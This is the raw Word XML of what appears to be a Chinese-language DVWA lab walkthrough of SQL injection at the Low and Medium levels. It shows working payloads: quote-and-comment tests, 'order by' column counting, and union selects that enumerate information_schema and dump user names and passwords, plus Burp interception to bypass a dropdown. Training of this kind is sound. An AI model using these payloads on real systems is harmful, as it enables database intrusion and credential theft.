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A1A7" w14:textId="5DEEC3C5" w:rsidR="00B55F94" w:rsidRDefault="00121E73" w:rsidP="00121E73">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121E73">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00121E73">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="00121E73">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9544E" w14:textId="1F304E56" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73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>
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就是S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入，是指</w:t>
      </w:r>
      <w:r w:rsidRPr="00121E73">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的，常常会导致整个数据库被“脱裤”，尽管如此，SQL注入仍是现在最常见的Web漏洞之一。近期很火的大使馆接连被黑事件，据说黑客依靠的就是常见的SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B39FF3A" w14:textId="1B012093" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73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154B6C57" w14:textId="0987FD48" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73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410C650F" w14:textId="138DC93E" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73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14:paraId="416E0C5E" w14:textId="0FA88592" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E7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SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注入思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18ED02" w14:textId="2EA65E01" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E7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是否存在注入，注入的是字符型，还是数字型注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A164D7" w14:textId="53B10A53" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E7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测试当前查询的表有多少字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E5F38F" w14:textId="0751493B" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E7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显示字段出现的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547303B2" w14:textId="32F9D779" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E7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看数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC0052" w14:textId="7DD7FCEE" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E7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看表名和字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F4041" w14:textId="742FA649" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E7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读取表中的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B277E" w14:textId="3A450B56" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73"/>
    <w:p w14:paraId="05D0C394" w14:textId="34EBB65F" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73"/>
    <w:p w14:paraId="51C0176D" w14:textId="514FA449" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73"/>
    <w:p w14:paraId="775E6FBD" w14:textId="7CF1A316" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73"/>
    <w:p w14:paraId="5D0A85E4" w14:textId="77BF6241" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73"/>
    <w:p w14:paraId="76893CAC" w14:textId="78E2935C" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73">
      <w:pPr>
        <w:pStyle w:val="1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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>evel:Low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="273C2071" w14:textId="7508A9EA" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6348F100" wp14:editId="0726C2B7">
            <wp:extent cx="5274310" cy="1012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221" w14:textId="66E73706" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Low等级的源码没有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进行任何防护过滤，存在明显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漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F36DC36" w14:textId="2E96C7A5" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来判断是否存在字符型注入或者数字型注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6975DC4F" w14:textId="61EF4A24" w:rsidR="00121E73" w:rsidRDefault="00121E73" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC2677" w14:textId="2EA05D56" w:rsidR="00121E73" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回了多个结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59298302" w14:textId="14530D6A" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41FC7D03" wp14:editId="7C5642F1">
            <wp:extent cx="5274310" cy="2898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6AB5" w14:textId="0944BD42" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由此可以判断存在字符型注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D4759" w14:textId="3FBA7CEA" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后查询有多少字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7056E217" w14:textId="46A04BB7" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>’ order by 5#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E85761D" w14:textId="2FB87FB9" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F9A3C1D" wp14:editId="3B00FB61">
            <wp:extent cx="2942857" cy="6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9A9F" w14:textId="5E3C508D" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回页面不正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEB1DEF" w14:textId="451D704E" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>’ order by 3#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF62509" w14:textId="371AD8C3" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF66055" wp14:editId="55DA69D4">
            <wp:extent cx="3276190" cy="74285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627" w14:textId="276C484A" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回页面不正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37712611" w14:textId="77777777" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>’ order by 2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C5FB3" w14:textId="77777777" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EFE17CB" wp14:editId="594C7A3D">
            <wp:extent cx="5274310" cy="11353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返回出数据，说明有两个字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001DFA15" w14:textId="2FC73171" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询字段的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C08542" w14:textId="7FC4FA35" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73"/>
    <w:p w14:paraId="42BFBD2A" w14:textId="50C8BC1D" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73"/>
    <w:p w14:paraId="3FE585CB" w14:textId="634A8DBE" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73"/>
    <w:p w14:paraId="3E2C996D" w14:textId="5006B78C" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73"/>
    <w:p w14:paraId="2CBC649B" w14:textId="526C539E" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73"/>
    <w:p w14:paraId="20D0AEEA" w14:textId="77777777" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658E0D9E" w14:textId="6E3BD07F" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>‘ union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> select 1,2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA901A" w14:textId="00D30AAC" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28066F22" wp14:editId="77A27DF6">
            <wp:extent cx="5274310" cy="1178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1CC9" w14:textId="7A4212D3" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D925A2" w14:textId="44A5CA6F" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> select 1,database()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753EC2D" w14:textId="53B93623" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19A3B61B" wp14:editId="3A867813">
            <wp:extent cx="5274310" cy="1202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044" w14:textId="0C1F9ED3" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取库名</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="341CCAA3" w14:textId="675E3099" w:rsidR="0039622B" w:rsidRDefault="0039622B" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再查询表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237B5445" w14:textId="43DE2C8E" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> select 1,table_name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tables_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E0BAC1" w14:textId="3D602658" w:rsidR="00992F4C" w:rsidRDefault="0052535A" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ECB97FB" wp14:editId="47FB78BD">
            <wp:extent cx="5274310" cy="17176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C0E2" w14:textId="28FC01BE" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DBAE96" w14:textId="399399B0" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> select 1,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tables_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=’users’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7BD392" w14:textId="78E736BA" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="376A0B72" wp14:editId="07D10631">
            <wp:extent cx="5274310" cy="13449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0274" w14:textId="77777777" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73"/>
    <w:p w14:paraId="367E52E3" w14:textId="77777777" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73"/>
    <w:p w14:paraId="295E4EED" w14:textId="77777777" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73"/>
    <w:p w14:paraId="70D98D6A" w14:textId="77777777" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73"/>
    <w:p w14:paraId="29CD1ED9" w14:textId="77777777" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73"/>
    <w:p w14:paraId="56F6CC9E" w14:textId="77777777" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73"/>
    <w:p w14:paraId="592B6EDC" w14:textId="3D2531DD" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>获取所有信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB4EA49" w14:textId="04EED688" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> select group_concat(user_id,first_name,last_name),group_concat(user,password) from users #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A8E457" w14:textId="17B34499" w:rsidR="0052535A" w:rsidRPr="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="535B6252" wp14:editId="13B87100">
            <wp:extent cx="5274310" cy="7359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928C" w14:textId="5514A15D" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="00121E73"/>
    <w:p w14:paraId="33EF3EB9" w14:textId="14F1A0FB" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="0052535A">
      <w:pPr>
        <w:pStyle w:val="1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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>evel:Medium</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="14B96EDD" w14:textId="28A2927D" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C76E335" wp14:editId="7BC75205">
            <wp:extent cx="5274310" cy="1402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84DF" w14:textId="54D58769" w:rsidR="0052535A" w:rsidRDefault="0052535A" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>edium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等级</w:t>
      </w:r>
      <w:r w:rsidR="004F7F19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F7F19">
        <w:t>mysqli_real_escape_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F7F19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对特殊符号进行转义了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB8AFE6" w14:textId="0FE5D03D" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还设置了下拉表单来限制注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E725BDE" w14:textId="3F27EBEF" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这时可以使用B</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包来更改注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79930072" w14:textId="5DFB97D5" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A260484" wp14:editId="22E59E6E">
            <wp:extent cx="5274310" cy="41205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B739" w14:textId="46AFFFC5" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>查询是否存在字符型注入和数字型注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F409E5" w14:textId="074161DE" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>’ or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7254369F" w14:textId="7BEB27D8" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EA384E2" wp14:editId="45D79E92">
            <wp:extent cx="5274310" cy="367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7D63" w14:textId="7B215B70" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BDDA96" w14:textId="1FDE5F34" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F70B1C" w14:textId="6F81A16A" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:t>1 or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1A4629" w14:textId="1CD8EC9F" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="484EB890" wp14:editId="6A0D573F">
            <wp:extent cx="5274310" cy="3208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5658" w14:textId="633994E1" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回数据成功，说明是数字型注入，数字型注入不需要引用引号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3311665D" w14:textId="039ED999" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续查询有多少个字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E80B4" w14:textId="7B0F1233" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> order by 3#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3A2093" w14:textId="3A8896C2" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B0CDC8E" wp14:editId="6776257A">
            <wp:extent cx="3009524" cy="695238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575C" w14:textId="766BEE0D" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25986C60" w14:textId="5A84BD1C" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1 order by 2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2FFC3A" w14:textId="3157D3CF" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E6B22A1" wp14:editId="0069EF54">
            <wp:extent cx="5274310" cy="1760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709D" w14:textId="68ED0555" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F270DB" w14:textId="5AE07FBD" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A"/>
    <w:p w14:paraId="4DCFEFB6" w14:textId="40DA567F" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>获取数据库名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13352B71" w14:textId="6138BF47" w:rsidR="004F7F19" w:rsidRDefault="004F7F19" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="009C20DF">
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009C20DF">
        <w:t>1,database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009C20DF">
        <w:t>()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F0186" w14:textId="07DE42EC" w:rsidR="009C20DF" w:rsidRDefault="009C20DF" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3023D87C" wp14:editId="6A34D50D">
            <wp:extent cx="4733333" cy="3009524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FA20" w14:textId="0EDD4B39" w:rsidR="009C20DF" w:rsidRDefault="009C20DF" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到数据库名称</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
